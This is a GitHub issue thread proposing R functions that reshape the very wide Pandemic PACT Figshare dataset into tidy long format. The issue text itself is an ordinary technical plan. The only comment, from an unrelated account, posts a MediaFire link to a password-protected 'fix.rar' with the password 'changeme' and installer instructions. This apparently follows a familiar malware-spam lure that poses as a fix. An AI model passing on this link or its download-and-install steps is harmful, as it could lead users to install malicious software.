### ISSUE TITLE
functions to process pandemic PACT data into tidy long format

### ISSUE THREAD

**Issue by ernestguevarra** [OxfordIHTM/pactr#5]
The datasets available from the Pandemic PACT Figshare repository are extremely wide format datasets. This is most likely a tool-driven data structure rather than a data structure by design chosen by the Pandemic PACT team. The most likely driver of this is the use of the RedCAP system which is not a fully relational database and the flattening or rectangularisation of the dataset is most likely the reason for having a dataset that has 860 fields.

This number of fields is due to multiple response items that have been flattened out to create a column for each possible answer and since at least one of the multiple response items is a country response, the permutations of all possible answers would be as many as there are countries.

Whilst this structure is machine-readable, it is hardly human-readable and not automatically machine-actionable.

[Tidy data structure](https://vita.had.co.nz/papers/tidy-data.pdf) is a good data structure model that can transform this data into becoming not only machine-readable but also machine-actionable while at the same time being human-readable.

To do this, we will probably need a set of functions that would do the following:

* [ ] Rename the fields for both raw and labelled tracker data (drawing from the labels articulated in the data dictionary);
* [ ] Pivot the data to long format with the fields with multiple responses having its own row of name and value pairs.

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
